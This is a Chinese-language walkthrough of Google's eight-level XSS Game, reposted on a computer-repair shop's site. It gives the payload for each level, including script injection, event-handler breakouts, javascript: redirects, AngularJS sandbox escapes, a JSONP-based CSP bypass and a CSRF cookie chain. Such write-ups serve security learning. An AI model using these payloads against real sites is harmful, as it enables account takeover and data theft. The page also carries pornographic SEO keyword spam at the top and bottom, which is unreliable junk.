国产精品久av福利在线观看_亚洲一区国产精品_亚洲黄色一区二区三区_欧美成人xxxx_国产精品www_xxxxx欧美_国产精品久久婷婷六月丁香_国产特级毛片

錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務技術文章
Google最新XSS Game Writeup

作者: 佚名  日期:2017-05-05 07:55:57   來源: 本站整理

 本文介紹了如何完成谷歌最新的XSSGame的過程,完成了這八個挑戰(zhàn)就有機會獲得Nexus 5x。實際上這八個挑戰(zhàn)總體來說都不難,都是些常見的xss。通關要求是只要能彈出alert窗口即可。
第一關 
 反射型xss,在搜索框提交的內(nèi)容最后會出現(xiàn)在結果頁面的html代碼里,沒有任何過濾,直接搜索:
script>alert('freebuf')script>

第二關
 還是反射型,提交內(nèi)容后會有一定延遲。通過查看html源碼可以知道延遲的時間(timer=)被直接插入到了img標簽里的onload事件里:
id="loading" src="/static/img/loading.gif" style="width: 50%" onload="startTimer('');" />

 直接請求url:/?timer=’-alert(1)-’,通關。
第三關
 展示了一些貓的圖片,當圖片換了后,url只是變化了#后面的內(nèi)容(#1 > #2),感覺可以通過這個id來反射xss
查看源代碼:
function chooseTab() {
     var html = "Cat " + parseInt() + "
";
     html += " +  + ".jpg' />";
      
     document.getElementById('tabContent').innerHTML = html;
      
     // Select the current tab
     var tabs = document.querySelectorAll('.tab');
     for (var i = 0; i if (tabs[i].id == "tab" + parseInt()) {
             tabs[i].className = "tab active";
         } else {
             tabs[i].className = "tab";
         }
     }
      
     window.location.hash = ;
      
     // Tell parent we've changed the tab
     top.postMessage({'url': self.location.toString()}, "*");
}
 哼,根據(jù)上一關的靈感,感覺可以繼續(xù)利用一下on事件,修改id后,圖片肯定是不存在的,于是使用onerror:
    #1'onerror=alert(1)>

 
搞定
第四關
 打開后是一個注冊頁面,讓我們填寫郵箱地址,注冊完成后通過url里面的next參數(shù)把我們跳轉(zhuǎn)回主頁,查看源碼:
 script>
  setTimeout(function() { window.location = user provided>; }, 1000);
script>
 在html中,鏈接可以是js代碼,比如:
a href="javascript:...">a>
直接請求這個跳轉(zhuǎn)url:
confirm?next=javascript:alert(1)
 

第五關
 一個F歌(foogle)搜索框,使用了angularJS 1.5.8,感覺是爆過漏洞的,上某網(wǎng)搜索(angularjs 1.5.8 injection)找到利用方法:
?utm_term=&utm_campaign={{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

 第六關
 angularJS 1.2版本的搜索框,在搜索框中提交的內(nèi)容最終進到了class為ng-non-bindable的div標簽里:
  #普通的div標簽
Normal: {{1 + 2}}
  #輸出:Normal: 3
  #ng-non-bindable
Ignored: {{1 + 2}}
  #輸出:Ignored: {{1 + 2}}
 隨后發(fā)現(xiàn)如果直接提交花括弧會被刪掉,于是使用“{”,最后構造這樣一個url:
?query={{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
第七關
 通過GET(參數(shù)menu)和JSONP請求加載了一個博客頁面,而響應的title,pictures會被處理為h1標簽和img標簽。關卡提示:common CSP bypass。
 猜測xss

可能會在menu參數(shù)里,JSONP里的callback參數(shù)(知識擴展)可以用來注入我們的js代碼,開始構造我們的url:
?menu=base64_encode(script src="jsonp?callback=alert(1)%3b%2f%2f">script>)
第八關
 要求是對任何用戶都有效,無論是登錄的還是未登錄的,要想通過必須得利用CSRF,self-xss,CSP。/transfer下是個很明顯的反射性xss,所以難度在于怎樣設置csrf_token可以匹配cookie。
 最后發(fā)現(xiàn)在登錄后會有一個請求設置用戶cookie并把用戶重定向到主頁,url如下:
 set?name=username&value=&redirect=index #作孽啊!
 根據(jù)這個url就可以猜測到后端代碼寫得是有多簡陋。。。
有了這個作孽的東西,我們就可以設置自己的csrf_token并把用戶重定向到/transfer,以便執(zhí)行我們注入的js代碼。構造如下url:
set?name=csrf_token&value=csrf_token>&redirect=url_encode(/transfer?name=freebufer&amount=3">script>alert(1)script>&csrf_token=csrf_token>)

寫出這種代碼的,在我們那是要被BGM的! 高中生第一次寫writeup,如有不足望擔待,勿噴。



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來減少網(wǎng)絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅(qū)動時提示不包含數(shù)字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網(wǎng)設置,IT服務外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設置,數(shù)據(jù)恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    最新热久久免费视频| 少妇愉情理伦三级| 激情文学亚洲色图| 色婷婷精品久久二区二区蜜臂av | 永久免费网站视频在线观看| 尤物av无码色av无码| 日本10禁啪啪无遮挡免费一区二区| 一区二区三区四区欧美| 操一操视频一区| 91看片淫黄大片91| 国产性生活一级片| 亚洲36d大奶网| 人妻内射一区二区在线视频| 丰满少妇xbxb毛片日本| av电影中文字幕| 中文字幕丰满乱码| 最新一区二区三区| 天天操天天干天天操| 猫咪成人官网| 黄色在线观看网| 午夜视频你懂的| 在线观看免费网站| 日韩有码在线观看| 91激情在线观看| 国产日韩亚洲欧美精品| 久久午夜影院| 亚洲性视频网站| 无码专区aaaaaa免费视频| 中午字幕在线观看| 疯狂揉花蒂控制高潮h| 国产精品久久久久久久久久久久久久久久久 | 热久久精品免费视频| 亚洲国产精品免费在线观看| 亚洲小说春色综合另类网蜜桃| 日本免费视频| 领导边摸边吃奶边做爽在线观看 | 国产精品无码粉嫩小泬| 日本黄色免费| h片在线观看视频免费免费| 成人激情电影在线| 午夜天堂精品久久久久| 成人国产精品免费观看视频| 2欧美一区二区三区在线观看视频 337p粉嫩大胆噜噜噜噜噜91av | 成人短视频在线| 欧美日韩性在线观看| 成人网18免费网站| 99热精品一区二区| 樱花影视一区二区| 在线视频中文亚洲| 热舞福利精品大尺度视频| 精品一区二区三区四区五区六区| 人妻少妇一区二区| 91美女视频在线| 男人j桶女人的网站| 国产精品久久久久久久久免费桃花| 亚洲人与黑人屁股眼交| 国产精品亲子伦av一区二区三区| 亚洲精品视频在线观看网站| 女人在下体塞跳蛋在线观看| 国内精品小视频在线观看| 国产精品久久久久av电视剧| 国产成人综合一区二区三区| 黄页在线免费看| 国产精品扒开腿做| 午夜精品毛片| 综合网在线观看| 777午夜精品视频在线播放| 国产主播av在线| 亚洲制服丝袜av| 成人精品第一区二区三区| 国内精品小视频在线观看| 国产激情一区| 91成年人网站| 久久久久久久久国产一区| 久久人妻无码aⅴ毛片a片app| 精品国产乱码久久| 亚洲一区二区av| 国产精品日韩欧美一区二区| 国产福利视频在线| 国产字幕在线观看| 国产成人亚洲综合青青| 日韩一区免费| 国产肥白大熟妇bbbb视频| 国产在线一区二区| 不卡av电影院| 国产三级在线播放| 99热亚洲精品| 成人性生活视频| 免费不卡av网站| 久久最新网址| 视频一区二区三区四区五区| 伊人伊成久久人综合网站| hd国产人妖ts另类视频| 久久久噜噜噜www成人网| 成人美女视频在线看| 亚洲综合激情六月婷婷在线观看| 国语自产精品视频在线看一大j8 | 丁香婷婷激情| 亚洲欧美福利一区二区| 国产永久免费高清在线观看视频| 精品人妻无码一区二区三区换脸| 精品日本一线二线三线不卡| 在线免费观看av网站| 欧美一级电影在线| 91在线免费视频观看| 人人干在线视频| 老汉色影院首页| 国产精品永久免费在线| 欧美精品久久一区| 国产一区二区精品久久91| 日韩美香港a一级毛片| 精品麻豆视频| 97免费公开视频| 日韩在线视频播放| 在线成年人视频| 五月天免费网站| 91久久精品在线| 一区二区三区在线观看网站| aaa在线播放视频| 日韩免费观看一区二区| 日韩美女免费视频| 久久a爱视频| 成人在线二区| 性欧美性free| 九九热这里只有在线精品视| 麻豆久久精品| 欧美乱大交xxxxx免费| 欧美一区观看| 2017欧美狠狠色| 外国成人毛片| 麻豆免费网站| 好吊色一区二区三区| 久久久久一区二区三区| 欧美精品做受xxx性少妇| 91欧美日韩| 国产偷激情在线| 亚洲精品少妇一区二区| 精品成人18| av资源在线免费观看| 欧美激情三级免费| 成人听书哪个软件好| 香蕉av一区二区三区| 免费cad大片在线观看| 日韩第一页在线| 99久久99久久综合| 国产一区二区三区不卡av| www.就去干.com| 91免费国产网站| 午夜精品视频在线观看| 天海翼一区二区三区四区在线观看 | 亚洲福利视频免费观看| 最新亚洲一区| wwwxxx亚洲| 亚洲综合中文字幕68页| 亚洲午夜未满十八勿入免费观看全集| 亚洲视频免费看| 二区在线视频| 深夜福利影院在线观看| 天天综合五月天| 国产成人精品综合久久久| 亚洲专区一二三| 91视频国产观看| 久草成人资源| 亚洲mmav| xxxx在线视频| 在线观看自拍| 丁香社区五月天| 国产精品久久久久久久av福利| 91手机在线播放| 国产日韩欧美制服另类| 日日夜夜综合| h视频在线免费| 免费a级观看| 尤物视频在线观看视频| 日本黄视频在线观看| 欧美精品一区二区三区久久久 | 欧美重口乱码一区二区| 国产精品美女一区二区三区| 国产欧美88| 女人色在线免费视频| 国产伦精品一区二区三区视频我| 日本在线成人一区二区| 久久亚洲成人精品| 在线看日本不卡| 电影一区二区三区| 国产对白在线正在播放| 国产乱码一区二区| 亚洲国内在线| 国内精品中文字幕| 69p69国产精品| 久久婷婷国产综合精品青草| 久久婷婷蜜乳一本欲蜜臀| 中文字幕在线高清| 青青草视频免费在线观看| 影音先锋男人资源在线观看| 久久国产精品视频在线观看| 精品国产乱码久久久久软件 | 一区二区三区四区日韩| 先锋av影院| 性欧美videos粗暴|